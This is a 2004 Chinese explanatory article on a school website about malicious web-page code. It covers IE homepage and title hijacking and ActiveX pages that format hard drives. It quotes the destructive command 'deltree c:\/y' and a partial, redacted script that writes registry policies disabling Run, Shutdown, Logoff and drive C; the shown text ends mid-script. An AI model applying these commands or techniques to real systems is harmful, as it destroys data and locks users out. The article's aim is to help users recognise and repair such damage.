張家港中等專業學校
設為首頁 | 加入收藏 | 網站地圖
 學校首頁 | 學校介紹 | 新聞中心 | 教學管理 | 黨建工作 | 師生園地 | 教學部門 | 招生就業 | 專題網站 | 對外交流 
師生園地
 名師風采 
 課堂内外 
 班級網站 
 心理健康 
 優秀學子 
當前位置: 學校首頁>>師生園地>>課堂内外>>計算機世界>>正文
抓住網頁惡意代碼的"黑手"
2004-02-19 10:28佚名   (閱讀次數:)
編者按:病毒的泛濫弄得計算機用戶人人自危,木馬的流行讓人感覺在互聯網上毫無隐私可言,而網上愈 演愈烈的"網頁病毒"更是攪得人心惶惶,從各方面的求救信号中可以略窺這"病毒"的症狀:在無意浏覽了一些網頁後,就發現IE标題欄、IE起始主頁被莫 名其妙地修改了、每次開機出現莫名其妙的提示框、修改輸入法啟動項、啟動無關程序......,更有文章稱:有些網頁"病毒"會格式化硬盤。更令人生厭的是,通過IE"工具"菜單下的"Internet選項"操作界面根本不能修改以恢複原狀。在互聯網發達的今天,誰不天天要浏覽衆多網頁?如果真有這樣一些病毒,豈還得了?編者從網友來信、論壇收集了一些信息,并對此作了比較詳細的分析後,認為這"病毒"的更大成分是惡意代碼。現在就讓我們一步一步地讓這些惡意代碼曝光,揭開其"神秘"的面紗!   以下是從網上一篇文章節選,作者對能格式化硬盤的惡意代碼來了一次"親密接觸",可真令人心驚膽顫的,看來說什麼惡意代碼能格式化硬盤并非空穴來風!   一日,忽然聽朋友說,他在上網的時候,不知點擊了什麼東西,而将他的硬盤全部給格式化了。我首先的念頭就是:該不會是中了那個有名的國産宏病毒"七月殺手"?不過這個宏病毒是在系統 Autoexec.bat文件中加入了"deltree c:\/y",應該不會格式化整個硬盤。那該不會是……   曾經在某個雜志上看到過一個介紹,說什麼IE浏覽器可以通過執行ActiveX而把硬盤格式化,而且記得當時還公布了源代碼,隻是當時公布的源代碼是針對西班牙版的Windows,對中文版的Windows沒有用,說不定那些代碼現在已經被一些高手給改成了針對中文Windows的呢。   問問自己的朋友,他也是稀裡糊塗地被格式化掉硬盤的,當時進入的網站也不記得了。沒有辦法,我隻好自己跑到國内的一些網站去找類似的主題文章。皇天不負苦心人,終于找到了幾個可以格式化硬盤的HTML文件。網站上的版主出自好心,提醒下載的網友:隻能供自己研究,不可害人。   考慮到危險性,我先用記事本随便打開其中一個看看源代碼,沒有想到這個源文件竟給加了密,裡面是用 JavaScript寫的腳本 ,加密的部分好像隻是一些字符的定義,而真正的腳本内容也隻是顯示一些字符在屏幕上。因為自己的機器是剛裝好的,沒有什麼特别重要的數據,所以就抱着"過把瘾就死"的念頭,用IE浏覽器打開了這個HTML文件。接着,浏覽器發出一個警告:"該頁上的ActiveX控件與頁上的其它部分進行交互可能不安全,是否允許進行交互?"。如果你選擇"是",則就會運行那些不安全控件。不過我試的這個HTML文件隻是給大家開個玩笑,你打開它後,它說什麼"你的C盤已經被它強行輸入格式化,一旦重新啟動就格式化了。請不要啟動,立 即保存有用的文件。"等諸如此類的話。我仔細檢查了一下Windows啟動程序裡的内容,也沒有什麼變化,于是放心大膽地重啟,果然是開的玩笑。   在下載的另外一個HTML文件中,看看源代碼,不禁吓了一跳。程序僅有的不足30行代碼中有24行都是調用Windows裡自帶的format.com命令,真是夠狠的。除了A、B兩個驅外,隻要你能夠分的區C-Z,都會被格式化。為了驗證其效果,又不想我的硬盤被格式化,我把Windows裡自帶的format.com給改了名字,然後用IE打開該HTML文件,浏覽器同樣發出一個警告:"該頁上的某些軟件(ActiveX控件)可能不安全。建議您不要運行。是否允許運行?"。當你選擇"是"的時候,會彈出幾十個DOS窗口,可能是因為它找不到 format.com這個文件,找開的所有DOS窗口都是什麼顯示也沒有。它不但調用了format.com,另外還加上了一些參數,如快速格式化等,再加上格式化時窗口就已經自動完成了硬盤格式化的工作,等你發現時也已經悔之晚矣。幸好我事先已經把硬盤裡的format.com給改了名字,否則後果可想而知。 中毒現象素描:   筆者對網上言論進行了搜集,将其分門别類陳列如下: (一)、默認主頁被修改 :   "最近,我的電腦發生了 一個奇怪的現象,浏覽器的默認主頁被自動設為www.********.com,一開始我并沒有留意,心想隻要在IE的"Internet選項"中修改回原來的設置就可以了,修改後,果然沒事了,但第二天開機,又被改回去了。" (二)、IE标題欄被修改:   "不知從什麼時候起,我的每個打開的IE頁裡的标題欄多出了什麼"讓曆史告訴未來,知青網"的字樣;" (三)、開機時出現提示框:   "一次浏覽了一個網頁後,在看了作者高現需寫的"去除IE默認主頁、标題詭異添加之一招兩式"(http://www.yesky.com/20010808/191701.shtml)後雖然解決了去除默認主頁問題,但沒法去掉開機時出現一個提示框,什麼“歡迎來訪www.play.cn.gs"之類的!" (四)、IE地址欄下多出了文字:   "地址欄下出現一些莫名其妙的文字,不知怎麼去掉。" (五)、在注冊表中對IE相關的注冊表項如默認主頁等修改無效:   "有些網站很可惡,它将IE的默認網頁設置成了該網站的名稱後,我自己通過修改注冊表項的"Start Page"和"Default_Page_URL"後仍不能生效,不知怎麼辦!" (六)、Internet Exploer中點擊右鍵,菜單中出現非法站點的鍊接:   "同樣也是由于一次訪問了一個網站,以後當浏覽網頁時,如果點擊右鍵,則彈出的菜單中有非法站點的鍊接。" (七)、修改了操作系統   "浏覽了一個網站,後來發現系統已經禁止了'關閉系統'、'運行'、'注銷'功能,并且C盤找不到了、注冊表編輯器regedit不能使用、DOS程序不能運行,無法進入系統實模式"。 程序講解   筆者了解一些有關Applet、ActiveX及腳本語言方面的知識,在下載含有惡意代碼後,對其引用的Javascript腳本文件進行了一些分析。由于安全原因,請恕我不能将代碼完整地寫出來或者對程序的編寫進行過細的講解,隻是讓大家了解到這個代碼并不神秘。JAVA的最初應用就是Applet程序。雖然JAVA對Applet的安全作出了限制,但由于浏覽器或語言漏洞的原因,當它與功能比較強大的腳本語言結合時,這些小應用程序常可憑借正常或詭秘的手段對用戶的機器進行修改,比如修改注冊表,運行相關的DOS命令,在用戶機器上安裝木馬或激活相關的應用程序,其功能之強大遠非單純的網頁所能勝任,由此看來,現在網上所流傳的說什麼浏覽相關網頁中病毒或者硬盤被格式化也就見怪不驚了。另外,還有一種嵌入式應用程序就是ActiveX,是微軟的一種插件技術,也可以象Applet一樣進行一些針對本機的操作。現在讓我們了解一下以下代碼編制的機理(如果你不了解腳本語言,可僅看看程序修改了哪些注冊表表項,然後找到這些表項并修改回來)。 document.write("〈APPLET HEIGHT=0 WIDTH=0 code=.......〉〈/APPLET〉"); file://嵌入Applet文件 function f){ file://做出種種修改的語句就在這個函數裡 try { //ActiveX initialization a1=document.applets[0]; file://獲取applet運行對象,以下語句指向注冊表中有關IE的表項 a1.setCLSID("{.............}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{.............}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{.............}"); a1.createInstance(); Net = a1.GetObject(); try { if ( document.cookie.indexOf("Chg") == -1) { //以下是對操作系統相關注冊表項值項的修改 //使系統沒有“運行”項,以防止用戶就不能通過注冊表編輯器來修複設置。 Shl.RegWrite ( "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\ Explorer\\NoRun", 01, "REG_BINARY"); //讓操作系統無“關閉系統”選項 Shl.RegWrite ( "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\ Explorer\\NoClose", 01, "REG_BINARY"); //讓操作系統無“注銷”選項 Shl.RegWrite ( "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\ Explorer\\NoLogOff", 01, "REG_BINARY"); 注:使受害者系統沒有“注銷”項 //讓操作系統無邏輯驅動器C Shl.RegWrite ( "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\ Explorer\\NoDrives",
關閉窗口

江蘇省張家港中等專業學校  地址:江蘇省張家港市沙洲西路109号
ICP備案号:蘇ICP備10015337号